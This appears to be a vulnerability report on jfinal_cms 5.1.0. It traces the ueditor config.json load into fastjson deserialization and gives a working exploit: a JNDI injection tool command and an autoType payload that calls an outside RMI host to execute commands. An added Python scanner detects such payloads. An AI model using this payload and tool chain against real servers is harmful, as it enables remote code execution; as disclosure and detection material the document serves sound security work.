jfinal_cms version: 5.1.0
JDK version: jdk-8u351
The ActionEnter class is instantiated in the index method of the /ueditor route
![image](https://user-images.githubusercontent.com/52622597/218020013-817ef70b-822c-4926-8145-87a6d0615e63.png)
The ConfigManager class is instantiated in the constructor of the ActionEnter class
![image](https://user-images.githubusercontent.com/52622597/218020892-8a89f4f8-61ec-4484-9896-1a6dce6369c5.png)
The constructor of ConfigManager calls initEnv()
![image](https://user-images.githubusercontent.com/52622597/218021014-2ead9fa5-183d-4f09-8f98-732118f458c4.png)
initEnv() calls JSONObject.parseObject to parse the file content. That file content is controllable, so replacing it with the payload is enough.
![image](https://user-images.githubusercontent.com/52622597/218021363-af4d55da-9618-4415-8257-93edc0c42d59.png)
The file comes from WEB-INF/classes/config.json. With any arbitrary file upload vulnerability in the admin backend, this file can be overwritten with one containing the payload, which triggers fastjson deserialization.
![image](https://user-images.githubusercontent.com/52622597/218021459-102737eb-7e93-4c47-8d5f-8fa37d001016.png)
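From the defender's side, the weak point described above is that the application trusts a JSON file on disk and hands it to a parser that honours `@type`. A simple pre-parse check over that file catches the two indicators this payload relies on. The following is an added example, not code from jfinal_cms, fastjson or the issue author; the function names (`walk`, `find_indicators`, `should_block`) and the benign config are constructed for illustration, while the malicious sample is the payload shown on this page.

```python
"""Scan a fastjson-parsed config file (e.g. WEB-INF/classes/config.json)
for autoType injection indicators before the application loads it.

Hypothetical defensive check (not part of jfinal_cms or fastjson):
flags any object carrying fastjson's "@type" key and any string value
that starts with a JNDI lookup scheme.
"""
import json
from typing import Any, Iterator

AUTOTYPE_KEY = "@type"  # fastjson's autoType trigger key
JNDI_SCHEMES = ("rmi://", "ldap://", "ldaps://", "iiop://")


def walk(node: Any, path: str = "$") -> Iterator[tuple[str, Any]]:
    """Yield (json_path, node) for every node in a parsed JSON tree."""
    yield path, node
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk(value, f"{path}[{index}]")


def find_indicators(text: str) -> list[str]:
    """Return human-readable findings; an empty list means nothing suspicious.

    The check runs on the parsed tree, not the raw text, so escaped forms of
    the key such as "\\u0040type" are seen as "@type", exactly as a JSON
    parser (fastjson included) would decode them.
    """
    try:
        data = json.loads(text)
    except json.JSONDecodeError as exc:
        return [f"malformed JSON: {exc}"]

    findings: list[str] = []
    for path, node in walk(data):
        if isinstance(node, dict) and AUTOTYPE_KEY in node:
            findings.append(
                f"{path}: autoType key {AUTOTYPE_KEY!r} = {node[AUTOTYPE_KEY]!r}"
            )
        if isinstance(node, str) and node.lower().startswith(JNDI_SCHEMES):
            findings.append(f"{path}: JNDI URL {node!r}")
    return findings


def should_block(text: str) -> bool:
    """True when the config must not be handed to the deserializer."""
    return bool(find_indicators(text))


# Constructed benign sample in the style of a ueditor config.
BENIGN_CONFIG = '{"imageActionName": "uploadimage", "imageMaxSize": 2048000}'

# The payload from this page, used here only as detection input.
MALICIOUS_CONFIG = """{
  "a": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"},
  "b": {"@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "rmi://192.168.0.110:1099/d0inxc",
        "autoCommit": true}
}"""

if __name__ == "__main__":
    for label, cfg in (("benign", BENIGN_CONFIG), ("malicious", MALICIOUS_CONFIG)):
        print(label, "->", "BLOCK" if should_block(cfg) else "ok")
        for finding in find_indicators(cfg):
            print("   ", finding)
```

Running this against a deployed config.json on a schedule, or on every admin-side write to WEB-INF/classes, turns the silent overwrite into an alert. It complements rather than replaces the real fix, which is to keep fastjson's autoType disabled for this parse.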
Run the JNDI injection tool on Kali
```
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe"
```
![image](https://user-images.githubusercontent.com/52622597/218023528-a9394bd8-c547-4d62-950d-6f62a5f8416b.png)
payload:
```
{
  "a": {
    "@type": "java.lang.Class",
    "val": "com.sun.rowset.JdbcRowSetImpl"
  },
  "b": {
    "@type": "com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName": "rmi://192.168.0.110:1099/d0inxc",
    "autoCommit": true
  }
}
```
![image](https://user-images.githubusercontent.com/52622597/218023884-c82ccd57-295a-4976-bbf6-ba9ead2ed9f2.png)
Replace the contents of config.json with the payload
Visit /ueditor; the command executes and the calculator pops up
![136699966-b0b2294c-cdf1-4145-9340-cc0885a7e73d](https://user-images.githubusercontent.com/52622597/218023269-ee300f45-d565-4416-9a0b-fc9250bc7622.gif)